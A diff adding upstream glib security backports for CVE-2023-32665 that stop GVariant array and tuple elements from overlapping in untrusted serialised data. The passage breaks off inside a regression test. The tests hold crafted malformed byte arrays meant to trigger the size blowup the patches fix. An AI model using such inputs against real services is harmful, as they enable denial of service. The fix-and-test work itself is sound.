index 0000000000..e361cc7aad
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0003.patch
@@ -0,0 +1,417 @@
+From ade71fb544391b2e33e1859645726bfee0d5eaaf Mon Sep 17 00:00:00 2001
+From: William Manley <will@stb-tester.com>
+Date: Wed, 16 Aug 2023 03:12:21 +0000
+Subject: [PATCH] gvariant: Don't allow child elements to overlap with each
+ other
+
+If different elements of a variable sized array can overlap with each
+other then we can cause a `GVariant` to normalise to a much larger type.
+
+This commit changes the behaviour of `GVariant` with non-normal form data. If
+an invalid frame offset is found all subsequent elements are given their
+default value.
+
+When retrieving an element at index `n` we scan the frame offsets up to index
+`n` and if they are not in order we return an element with the default value
+for that type.  This guarantees that elements don't overlap with each
+other.  We remember the offset we've scanned up to so we don't need to
+repeat this work on subsequent accesses.  We skip these checks for trusted
+data.
+
+Unfortunately this makes random access of untrusted data O(n) — at least
+on first access.  It doesn't affect the algorithmic complexity of accessing
+elements in order, such as when using the `GVariantIter` interface.  Also:
+the cost of validation will be amortised as the `GVariant` instance is
+continued to be used.
+
+I've implemented this with 4 different functions, 1 for each element size,
+rather than looping calling `gvs_read_unaligned_le` in the hope that the
+compiler will find it easy to optimise and should produce fairly tight
+code.
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/ade71fb544391b2e33e1859645726bfee0d5eaaf]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c       | 35 ++++++++++++++++
+ glib/gvariant-serialiser.c | 86 ++++++++++++++++++++++++++++++++++++--
+ glib/gvariant-serialiser.h |  8 ++++
+ glib/tests/gvariant.c      | 45 ++++++++++++++++++++
+ 4 files changed, 171 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index aa0e0a0..9b51e15 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -65,6 +65,7 @@ struct _GVariant
+     {
+       GBytes *bytes;
+       gconstpointer data;
++      gsize ordered_offsets_up_to;
+     } serialised;
+ 
+     struct
+@@ -162,6 +163,24 @@ struct _GVariant
+  *                if .data pointed to the appropriate number of nul
+  *                bytes.
+  *
++ *     .ordered_offsets_up_to: If ordered_offsets_up_to == n this means that all
++ *                             the frame offsets up to and including the frame
++ *                             offset determining the end of element n are in
++ *                             order. This guarantees that the bytes of element
++ *                             n don't overlap with any previous element.
++ *
++ *                             For trusted data this is set to G_MAXSIZE and we
++ *                             don't check that the frame offsets are in order.
++ *
++ *                             Note: This doesn't imply the offsets are good in
++ *                             any way apart from their ordering.  In particular
++ *                             offsets may be out of bounds for this value or
++ *                             may imply that the data overlaps the frame
++ *                             offsets themselves.
++ *
++ *                             This field is only relevant for arrays of non
++ *                             fixed width types.
++ *
+  *   .tree: Only valid when the instance is in tree form.
+  *
+  *          Note that accesses from other threads could result in
+@@ -365,6 +384,7 @@ g_variant_to_serialised (GVariant *value)
+       (gpointer) value->contents.serialised.data,
+       value->size,
+       value->depth,
++      value->contents.serialised.ordered_offsets_up_to,
+     };
+     return serialised;
+   }
+@@ -396,6 +416,7 @@ g_variant_serialise (GVariant *value,
+   serialised.size = value->size;
+   serialised.data = data;
+   serialised.depth = value->depth;
++  serialised.ordered_offsets_up_to = 0;
+ 
+   children = (gpointer *) value->contents.tree.children;
+   n_children = value->contents.tree.n_children;
+@@ -439,6 +460,15 @@ g_variant_fill_gvs (GVariantSerialised *serialised,
+   g_assert (serialised->size == value->size);
+   serialised->depth = value->depth;
+ 
++  if (value->state & STATE_SERIALISED)
++    {
++      serialised->ordered_offsets_up_to = value->contents.serialised.ordered_offsets_up_to;
++    }
++  else
++    {
++      serialised->ordered_offsets_up_to = 0;
++    }
++
+   if (serialised->data)
+     /* g_variant_store() is a public API, so it
+      * it will reacquire the lock if it needs to.
+@@ -481,6 +511,7 @@ g_variant_ensure_serialised (GVariant *value)
+       bytes = g_bytes_new_take (data, value->size);
+       value->contents.serialised.data = g_bytes_get_data (bytes, NULL);
+       value->contents.serialised.bytes = bytes;
++      value->contents.serialised.ordered_offsets_up_to = G_MAXSIZE;
+       value->state |= STATE_SERIALISED;
+     }
+ }
+@@ -561,6 +592,7 @@ g_variant_new_from_bytes (const GVariantType *type,
+   serialised.type_info = value->type_info;
+   serialised.data = (guchar *) g_bytes_get_data (bytes, &serialised.size);
+   serialised.depth = 0;
++  serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
+ 
+   if (!g_variant_serialised_check (serialised))
+     {
+@@ -610,6 +642,8 @@ g_variant_new_from_bytes (const GVariantType *type,
+       value->contents.serialised.data = g_bytes_get_data (bytes, &value->size);
+     }
+ 
++  value->contents.serialised.ordered_offsets_up_to = trusted ? G_MAXSIZE : 0;
++
+   g_clear_pointer (&owned_bytes, g_bytes_unref);
+ 
+   return value;
+@@ -1108,6 +1142,7 @@ g_variant_get_child_value (GVariant *value,
+     child->contents.serialised.bytes =
+       g_bytes_ref (value->contents.serialised.bytes);
+     child->contents.serialised.data = s_child.data;
++    child->contents.serialised.ordered_offsets_up_to = s_child.ordered_offsets_up_to;
+ 
+     return child;
+   }
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index c7c2114..fe0b1a4 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1,6 +1,7 @@
+ /*
+  * Copyright © 2007, 2008 Ryan Lortie
+  * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+  *
+  * This library is free software; you can redistribute it and/or
+  * modify it under the terms of the GNU Lesser General Public
+@@ -264,6 +265,7 @@ gvs_fixed_sized_maybe_get_child (GVariantSerialised value,
+   value.type_info = g_variant_type_info_element (value.type_info);
+   g_variant_type_info_ref (value.type_info);
+   value.depth++;
++  value.ordered_offsets_up_to = 0;
+ 
+   return value;
+ }
+@@ -295,7 +297,7 @@ gvs_fixed_sized_maybe_serialise (GVariantSerialised        value,
+ {
+   if (n_children)
+     {
+-      GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1 };
++      GVariantSerialised child = { NULL, value.data, value.size, value.depth + 1, 0 };
+ 
+       gvs_filler (&child, children[0]);
+     }
+@@ -317,6 +319,7 @@ gvs_fixed_sized_maybe_is_normal (GVariantSerialised value)
+       /* proper element size: "Just".  recurse to the child. */
+       value.type_info = g_variant_type_info_element (value.type_info);
+       value.depth++;
++      value.ordered_offsets_up_to = 0;
+ 
+       return g_variant_serialised_is_normal (value);
+     }
+@@ -358,6 +361,7 @@ gvs_variable_sized_maybe_get_child (GVariantSerialised value,
+     value.data = NULL;
+ 
+   value.depth++;
++  value.ordered_offsets_up_to = 0;
+ 
+   return value;
+ }
+@@ -388,7 +392,7 @@ gvs_variable_sized_maybe_serialise (GVariantSerialised        value,
+ {
+   if (n_children)
+     {
+-      GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1 };
++      GVariantSerialised child = { NULL, value.data, value.size - 1, value.depth + 1, 0 };
+ 
+       /* write the data for the child.  */
+       gvs_filler (&child, children[0]);
+@@ -408,6 +412,7 @@ gvs_variable_sized_maybe_is_normal (GVariantSerialised value)
+   value.type_info = g_variant_type_info_element (value.type_info);
+   value.size--;
+   value.depth++;
++  value.ordered_offsets_up_to = 0;
+ 
+   return g_variant_serialised_is_normal (value);
+ }
+@@ -691,6 +696,32 @@ gvs_variable_sized_array_n_children (GVariantSerialised value)
+   return gvs_variable_sized_array_get_frame_offsets (value).length;
+ }
+ 
++/* Find the index of the first out-of-order element in @data, assuming that
++ * @data is an array of elements of given @type, starting at index @start and
++ * containing a further @len-@start elements. */
++#define DEFINE_FIND_UNORDERED(type) \
++  static gsize \
++  find_unordered_##type (const guint8 *data, gsize start, gsize len) \
++  { \
++    gsize off; \
++    type current, previous; \
++    \
++    memcpy (&previous, data + start * sizeof (current), sizeof (current)); \
++    for (off = (start + 1) * sizeof (current); off < len * sizeof (current); off += sizeof (current)) \
++      { \
++        memcpy (&current, data + off, sizeof (current)); \
++        if (current < previous) \
++          break; \
++        previous = current; \
++      } \
++    return off / sizeof (current) - 1; \
++  }
++
++DEFINE_FIND_UNORDERED (guint8);
++DEFINE_FIND_UNORDERED (guint16);
++DEFINE_FIND_UNORDERED (guint32);
++DEFINE_FIND_UNORDERED (guint64);
++
+ static GVariantSerialised
+ gvs_variable_sized_array_get_child (GVariantSerialised value,
+                                     gsize              index_)
+@@ -706,6 +737,49 @@ gvs_variable_sized_array_get_child (GVariantSerialised value,
+   g_variant_type_info_ref (child.type_info);
+   child.depth = value.depth + 1;
+ 
++  /* If the requested @index_ is beyond the set of indices whose framing offsets
++   * have been checked, check the remaining offsets to see whether they’re
++   * normal (in order, no overlapping array elements). */
++  if (index_ > value.ordered_offsets_up_to)
++    {
++      switch (offsets.offset_size)
++        {
++        case 1:
++          {
++            value.ordered_offsets_up_to = find_unordered_guint8 (
++                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++            break;
++          }
++        case 2:
++          {
++            value.ordered_offsets_up_to = find_unordered_guint16 (
++                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++            break;
++          }
++        case 4:
++          {
++            value.ordered_offsets_up_to = find_unordered_guint32 (
++                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++            break;
++          }
++        case 8:
++          {
++            value.ordered_offsets_up_to = find_unordered_guint64 (
++                offsets.array, value.ordered_offsets_up_to, index_ + 1);
++            break;
++          }
++        default:
++          /* gvs_get_offset_size() only returns maximum 8 */
++          g_assert_not_reached ();
++        }
++    }
++
++  if (index_ > value.ordered_offsets_up_to)
++    {
++      /* Offsets are invalid somewhere, so return an empty child. */
++      return child;
++    }
++
+   if (index_ > 0)
+     {
+       guint alignment;
+@@ -840,6 +914,9 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+ 
+   g_assert (offset == offsets.data_size);
+ 
++  /* All offsets have now been checked. */
++  value.ordered_offsets_up_to = G_MAXSIZE;
++
+   return TRUE;
+ }
+ 
+@@ -1072,7 +1149,7 @@ gvs_tuple_is_normal (GVariantSerialised value)
+   for (i = 0; i < length; i++)
+     {
+       const GVariantMemberInfo *member_info;
+-      GVariantSerialised child;
++      GVariantSerialised child = { 0, };
+       gsize fixed_size;
+       guint alignment;
+       gsize end;
+@@ -1132,6 +1209,9 @@ gvs_tuple_is_normal (GVariantSerialised value)
+       offset = end;
+     }
+ 
++  /* All element bounds have been checked above. */
++  value.ordered_offsets_up_to = G_MAXSIZE;
++
+   {
+     gsize fixed_size;
+     guint alignment;
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 81343e9..99d18ef 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -29,6 +29,14 @@ typedef struct
+   guchar           *data;
+   gsize             size;
+   gsize             depth;  /* same semantics as GVariant.depth */
++  /* If ordered_offsets_up_to == n this means that all the frame offsets up to and
++   * including the frame offset determining the end of element n are in order.
++   * This guarantees that the bytes of element n don't overlap with any previous
++   * element.
++   *
++   * This is both read and set by g_variant_serialised_get_child for arrays of
++   * non-fixed-width types */
++  gsize             ordered_offsets_up_to;
+ } GVariantSerialised;
+ 
+ /* deserialisation */
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 0e5ec8e..967e9a1 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,5 +1,6 @@
+ /*
+  * Copyright © 2010 Codethink Limited
++ * Copyright © 2020 William Manley
+  *
+  * This library is free software; you can redistribute it and/or
+  * modify it under the terms of the GNU Lesser General Public
+@@ -1283,6 +1284,7 @@ random_instance_filler (GVariantSerialised *serialised,
+     serialised->size = instance->size;
+ 
+   serialised->depth = 0;
++  serialised->ordered_offsets_up_to = 0;
+ 
+   g_assert_true (serialised->type_info == instance->type_info);
+   g_assert_cmpuint (serialised->size, ==, instance->size);
+@@ -5039,6 +5041,47 @@ test_normal_checking_array_offsets (void)
+   g_variant_unref (variant);
+ }
+ 
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that array elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_832242 */
++static void
++test_normal_checking_array_offsets2 (void)
++{
++  const guint8 data[] = {
++    'h', 'i', '\0',
++    0x03, 0x00, 0x03,
++    0x06, 0x00, 0x06,
++    0x09, 0x00, 0x09,
++    0x0c, 0x00, 0x0c,
++    0x0f, 0x00, 0x0f,
++    0x12, 0x00, 0x12,
++    0x15, 0x00, 0x15,
++  };
++  gsize size = sizeof (data);
++  const GVariantType *aaaaaaas = G_VARIANT_TYPE ("aaaaaaas");
++  GVariant *variant = NULL;
++  GVariant *normal_variant = NULL;
++  GVariant *expected = NULL;
++
++  variant = g_variant_new_from_data (aaaaaaas, data, size, FALSE, NULL, NULL);
++  g_assert_nonnull (variant);
++
++  normal_variant = g_variant_get_normal_form (variant);
++  g_assert_nonnull (normal_variant);
++  g_assert_cmpuint (g_variant_get_size (normal_variant), <=, size * 2);
++
++  expected = g_variant_new_parsed (
++      "[[[[[[['hi', '', ''], [], []], [], []], [], []], [], []], [], []], [], []]");
++  g_assert_cmpvariant (expected, variant);
++  g_assert_cmpvariant (expected, normal_variant);
++
++  g_variant_unref (expected);
++  g_variant_unref (normal_variant);
++  g_variant_unref (variant);
++}
++
+ /* Test that a tuple with invalidly large values in its offset table is
+  * normalised successfully without looping infinitely. */
+ static void
+@@ -5206,6 +5249,8 @@ main (int argc, char **argv)
+                    test_normal_checking_tuples);
+   g_test_add_func ("/gvariant/normal-checking/array-offsets",
+                    test_normal_checking_array_offsets);
++  g_test_add_func ("/gvariant/normal-checking/array-offsets2",
++                   test_normal_checking_array_offsets2);
+   g_test_add_func ("/gvariant/normal-checking/tuple-offsets",
+                    test_normal_checking_tuple_offsets);
+   g_test_add_func ("/gvariant/normal-checking/empty-object-path",
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
new file mode 100644
index 0000000000..c057729aae
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0004.patch
@@ -0,0 +1,113 @@
+From 345cae9c1aa7bf6752039225ef4c8d8d69fa8d76 Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:09:12 +0000
+Subject: [PATCH] gvariant-serialiser: Factor out code to get bounds of a tuple
+ member
+
+This introduces no functional changes.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/345cae9c1aa7bf6752039225ef4c8d8d69fa8d76]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 73 ++++++++++++++++++++++++--------------
+ 1 file changed, 46 insertions(+), 27 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fe0b1a4..6f9b366 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,51 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+  * for the tuple.  See the notes in gvarianttypeinfo.h.
+  */
+ 
++static void
++gvs_tuple_get_member_bounds (GVariantSerialised  value,
++                             gsize               index_,
++                             gsize               offset_size,
++                             gsize              *out_member_start,
++                             gsize              *out_member_end)
++{
++  const GVariantMemberInfo *member_info;
++  gsize member_start, member_end;
++
++  member_info = g_variant_type_info_member_info (value.type_info, index_);
++
++  if (member_info->i + 1)
++    member_start = gvs_read_unaligned_le (value.data + value.size -
++                                          offset_size * (member_info->i + 1),
++                                          offset_size);
++  else
++    member_start = 0;
++
++  member_start += member_info->a;
++  member_start &= member_info->b;
++  member_start |= member_info->c;
++
++  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
++    member_end = value.size - offset_size * (member_info->i + 1);
++
++  else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++    {
++      gsize fixed_size;
++
++      g_variant_type_info_query (member_info->type_info, NULL, &fixed_size);
++      member_end = member_start + fixed_size;
++    }
++
++  else /* G_VARIANT_MEMBER_ENDING_OFFSET */
++    member_end = gvs_read_unaligned_le (value.data + value.size -
++                                        offset_size * (member_info->i + 2),
++                                        offset_size);
++
++  if (out_member_start != NULL)
++    *out_member_start = member_start;
++  if (out_member_end != NULL)
++    *out_member_end = member_end;
++}
++
+ static gsize
+ gvs_tuple_n_children (GVariantSerialised value)
+ {
+@@ -997,33 +1042,7 @@ gvs_tuple_get_child (GVariantSerialised value,
+         }
+     }
+ 
+-  if (member_info->i + 1)
+-    start = gvs_read_unaligned_le (value.data + value.size -
+-                                   offset_size * (member_info->i + 1),
+-                                   offset_size);
+-  else
+-    start = 0;
+-
+-  start += member_info->a;
+-  start &= member_info->b;
+-  start |= member_info->c;
+-
+-  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_LAST)
+-    end = value.size - offset_size * (member_info->i + 1);
+-
+-  else if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
+-    {
+-      gsize fixed_size;
+-
+-      g_variant_type_info_query (child.type_info, NULL, &fixed_size);
+-      end = start + fixed_size;
+-      child.size = fixed_size;
+-    }
+-
+-  else /* G_VARIANT_MEMBER_ENDING_OFFSET */
+-    end = gvs_read_unaligned_le (value.data + value.size -
+-                                 offset_size * (member_info->i + 2),
+-                                 offset_size);
++  gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+ 
+   /* The child should not extend into the offset table. */
+   if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
new file mode 100644
index 0000000000..7e516b07ab
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0005.patch
@@ -0,0 +1,80 @@
+From 73d0aa81c2575a5c9ae77dcb94da919579014fc0 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Fri, 11 Aug 2023 04:13:02 +0000
+Subject: [PATCH] gvariant-serialiser: Rework child size calculation
+
+This reduces a few duplicate calls to `g_variant_type_info_query()` and
+explains why they’re needed.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Helps: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/73d0aa81c2575a5c9ae77dcb94da919579014fc0]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-serialiser.c | 31 +++++++++----------------------
+ 1 file changed, 9 insertions(+), 22 deletions(-)
+
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index 6f9b366..fb75923 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -1007,14 +1007,18 @@ gvs_tuple_get_child (GVariantSerialised value,
+   child.depth = value.depth + 1;
+   offset_size = gvs_get_offset_size (value.size);
+ 
++  /* Ensure the size is set for fixed-sized children, or
++   * g_variant_serialised_check() will fail, even if we return
++   * (child.data == NULL) to indicate an error. */
++  if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_FIXED)
++    g_variant_type_info_query (child.type_info, NULL, &child.size);
++
+   /* tuples are the only (potentially) fixed-sized containers, so the
+    * only ones that have to deal with the possibility of having %NULL
+    * data with a non-zero %size if errors occurred elsewhere.
+    */
+   if G_UNLIKELY (value.data == NULL && value.size != 0)
+     {
+-      g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+       /* this can only happen in fixed-sized tuples,
+        * so the child must also be fixed sized.
+        */
+@@ -1032,29 +1036,12 @@ gvs_tuple_get_child (GVariantSerialised value,
+   else
+     {
+       if (offset_size * (member_info->i + 1) > value.size)
+-        {
+-          /* if the child is fixed size, return its size.
+-           * if child is not fixed-sized, return size = 0.
+-           */
+-          g_variant_type_info_query (child.type_info, NULL, &child.size);
+-
+-          return child;
+-        }
++        return child;
+     }
+ 
+-  gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
+-
+   /* The child should not extend into the offset table. */
+-  if (index_ != g_variant_type_info_n_members (value.type_info) - 1)
+-    {
+-      GVariantSerialised last_child;
+-      last_child = gvs_tuple_get_child (value,
+-                                        g_variant_type_info_n_members (value.type_info) - 1);
+-      last_end = last_child.data + last_child.size - value.data;
+-      g_variant_type_info_unref (last_child.type_info);
+-    }
+-  else
+-    last_end = end;
++  gvs_tuple_get_member_bounds (value, index_, offset_size, &start, &end);
++  gvs_tuple_get_member_bounds (value, g_variant_type_info_n_members (value.type_info) - 1, offset_size, NULL, &last_end);
+ 
+   if (start < end && end <= value.size && end <= last_end)
+     {
+-- 
+2.24.4
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
new file mode 100644
index 0000000000..8558a7911f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2023-32665-0006.patch
@@ -0,0 +1,396 @@
+From 7cf6f5b69146d20948d42f0c476688fe17fef787 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Wed, 16 Aug 2023 12:09:06 +0000
+Subject: [PATCH] gvariant: Don't allow child elements of a tuple to overlap
+ each other
+
+This is similar to the earlier commit which prevents child elements of a
+variable-sized array from overlapping each other, but this time for
+tuples. It is based heavily on ideas by William Manley.
+
+Tuples are slightly different from variable-sized arrays in that they
+contain a mixture of fixed and variable sized elements. All but one of
+the variable sized elements have an entry in the frame offsets table.
+This means that if we were to just check the ordering of the frame
+offsets table, the variable sized elements could still overlap
+interleaving fixed sized elements, which would be bad.
+
+Therefore we have to check the elements rather than the frame offsets.
+
+The logic of checking the elements up to the index currently being
+requested, and caching the result in `ordered_offsets_up_to`, means that
+the algorithmic cost implications are the same for this commit as for
+variable-sized arrays: an O(N) cost for these checks is amortised out
+over N accesses to O(1) per access.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+
+Fixes: #2121
+
+CVE: CVE-2023-32665
+Upstream-Status: Backport from [https://gitlab.gnome.org/GNOME/glib/-/commit/7cf6f5b69146d20948d42f0c476688fe17fef787]
+Signed-off-by: Siddharth Doshi <sdoshi@mvista.com>
+---
+ glib/gvariant-core.c       |   6 +-
+ glib/gvariant-serialiser.c |  40 ++++++++
+ glib/gvariant-serialiser.h |   7 +-
+ glib/gvariant.c            |   1 +
+ glib/tests/gvariant.c      | 181 +++++++++++++++++++++++++++++++++++++
+ 5 files changed, 232 insertions(+), 3 deletions(-)
+
+diff --git a/glib/gvariant-core.c b/glib/gvariant-core.c
+index 9b51e15..b951cd9 100644
+--- a/glib/gvariant-core.c
++++ b/glib/gvariant-core.c
+@@ -1,6 +1,7 @@
+ /*
+  * Copyright © 2007, 2008 Ryan Lortie
+  * Copyright © 2010 Codethink Limited
++ * Copyright © 2022 Endless OS Foundation, LLC
+  *
+  * This library is free software; you can redistribute it and/or
+  * modify it under the terms of the GNU Lesser General Public
+@@ -179,7 +180,7 @@ struct _GVariant
+  *                             offsets themselves.
+  *
+  *                             This field is only relevant for arrays of non
+- *                             fixed width types.
++ *                             fixed width types and for tuples.
+  *
+  *   .tree: Only valid when the instance is in tree form.
+  *
+@@ -1117,6 +1118,9 @@ g_variant_get_child_value (GVariant *value,
+      */
+     s_child = g_variant_serialised_get_child (serialised, index_);
+ 
++    /* Update the cached ordered_offsets_up_to, since @serialised will be thrown away when this function exits */
++    value->contents.serialised.ordered_offsets_up_to = MAX (value->contents.serialised.ordered_offsets_up_to, serialised.ordered_offsets_up_to);
++
+     /* Check whether this would cause nesting too deep. If so, return a fake
+      * child. The only situation we expect this to happen in is with a variant,
+      * as all other deeply-nested types have a static type, and hence should
+diff --git a/glib/gvariant-serialiser.c b/glib/gvariant-serialiser.c
+index fb75923..cd4a3e6 100644
+--- a/glib/gvariant-serialiser.c
++++ b/glib/gvariant-serialiser.c
+@@ -942,6 +942,10 @@ gvs_variable_sized_array_is_normal (GVariantSerialised value)
+  * for the tuple.  See the notes in gvarianttypeinfo.h.
+  */
+ 
++/* Note: This doesn’t guarantee that @out_member_end >= @out_member_start; that
++ * condition may not hold true for invalid serialised variants. The caller is
++ * responsible for checking the returned values and handling invalid ones
++ * appropriately. */
+ static void
+ gvs_tuple_get_member_bounds (GVariantSerialised  value,
+                              gsize               index_,
+@@ -1028,6 +1032,42 @@ gvs_tuple_get_child (GVariantSerialised value,
+       return child;
+     }
+ 
++  /* If the requested @index_ is beyond the set of indices whose framing offsets
++   * have been checked, check the remaining offsets to see whether they’re
++   * normal (in order, no overlapping tuple elements).
++   *
++   * Unlike the checks in gvs_variable_sized_array_get_child(), we have to check
++   * all the tuple *elements* here, not just all the framing offsets, since
++   * tuples contain a mix of elements which use framing offsets and ones which
++   * don’t. None of them are allowed to overlap. */
++  if (index_ > value.ordered_offsets_up_to)
++    {
++      gsize i, prev_i_end = 0;
++
++      if (value.ordered_offsets_up_to > 0)
++        gvs_tuple_get_member_bounds (value, value.ordered_offsets_up_to - 1, offset_size, NULL, &prev_i_end);
++
++      for (i = value.ordered_offsets_up_to; i <= index_; i++)
++        {
++          gsize i_start, i_end;
++
++          gvs_tuple_get_member_bounds (value, i, offset_size, &i_start, &i_end);
++
++          if (i_start > i_end || i_start < prev_i_end || i_end > value.size)
++            break;
++
++          prev_i_end = i_end;
++        }
++
++      value.ordered_offsets_up_to = i - 1;
++    }
++
++  if (index_ > value.ordered_offsets_up_to)
++    {
++      /* Offsets are invalid somewhere, so return an empty child. */
++      return child;
++    }
++
+   if (member_info->ending_type == G_VARIANT_MEMBER_ENDING_OFFSET)
+     {
+       if (offset_size * (member_info->i + 2) > value.size)
+diff --git a/glib/gvariant-serialiser.h b/glib/gvariant-serialiser.h
+index 99d18ef..144aec8 100644
+--- a/glib/gvariant-serialiser.h
++++ b/glib/gvariant-serialiser.h
+@@ -34,8 +34,11 @@ typedef struct
+    * This guarantees that the bytes of element n don't overlap with any previous
+    * element.
+    *
+-   * This is both read and set by g_variant_serialised_get_child for arrays of
+-   * non-fixed-width types */
++   * This is both read and set by g_variant_serialised_get_child() for arrays of
++   * non-fixed-width types, and for tuples.
++   *
++   * Even when dealing with tuples, @ordered_offsets_up_to is an element index,
++   * rather than an index into the frame offsets. */
+   gsize             ordered_offsets_up_to;
+ } GVariantSerialised;
+ 
+diff --git a/glib/gvariant.c b/glib/gvariant.c
+index d6f68a9..cdb428e 100644
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -5945,6 +5945,7 @@ g_variant_byteswap (GVariant *value)
+       serialised.type_info = g_variant_get_type_info (trusted);
+       serialised.size = g_variant_get_size (trusted);
+       serialised.data = g_malloc (serialised.size);
++      serialised.ordered_offsets_up_to = G_MAXSIZE;  /* operating on the normal form */
+       g_variant_store (trusted, serialised.data);
+       g_variant_unref (trusted);
+ 
+diff --git a/glib/tests/gvariant.c b/glib/tests/gvariant.c
+index 967e9a1..a84b02e 100644
+--- a/glib/tests/gvariant.c
++++ b/glib/tests/gvariant.c
+@@ -1,6 +1,7 @@
+ /*
+  * Copyright © 2010 Codethink Limited
+  * Copyright © 2020 William Manley
++ * Copyright © 2022 Endless OS Foundation, LLC
+  *
+  * This library is free software; you can redistribute it and/or
+  * modify it under the terms of the GNU Lesser General Public
+@@ -1451,6 +1452,7 @@ test_maybe (void)
+         serialised.data = flavoured_malloc (needed_size, flavour);
+         serialised.size = needed_size;
+         serialised.depth = 0;
++	serialised.ordered_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised,
+                                         random_instance_filler,
+@@ -1574,6 +1576,7 @@ test_array (void)
+         serialised.data = flavoured_malloc (needed_size, flavour);
+         serialised.size = needed_size;
+         serialised.depth = 0;
++	serialised.ordered_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) instances, n_children);
+@@ -1738,6 +1741,7 @@ test_tuple (void)
+         serialised.data = flavoured_malloc (needed_size, flavour);
+         serialised.size = needed_size;
+         serialised.depth = 0;
++	serialised.ordered_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) instances, n_children);
+@@ -1834,6 +1838,7 @@ test_variant (void)
+         serialised.data = flavoured_malloc (needed_size, flavour);
+         serialised.size = needed_size;
+         serialised.depth = 0;
++	serialised.ordered_offsets_up_to = 0;
+ 
+         g_variant_serialiser_serialise (serialised, random_instance_filler,
+                                         (gpointer *) &instance, 1);
+@@ -5106,6 +5111,176 @@ test_normal_checking_tuple_offsets (void)
+   g_variant_unref (variant);
+ }
+ 
++/* This is a regression test that we can't have non-normal values that take up
++ * significantly more space than the normal equivalent, by specifying the
++ * offset table entries so that tuple elements overlap.
++ *
++ * See https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838503 and
++ * https://gitlab.gnome.org/GNOME/glib/-/issues/2121#note_838513 */
++static void
++test_normal_checking_tuple_offsets2 (void)
++{
++  const GVariantType *data_type = G_VARIANT_TYPE ("(yyaiyyaiyy)");
++  const guint8 data[] = {
++    0x12, 0x34, 0x56, 0x78, 0x01,
++    /*
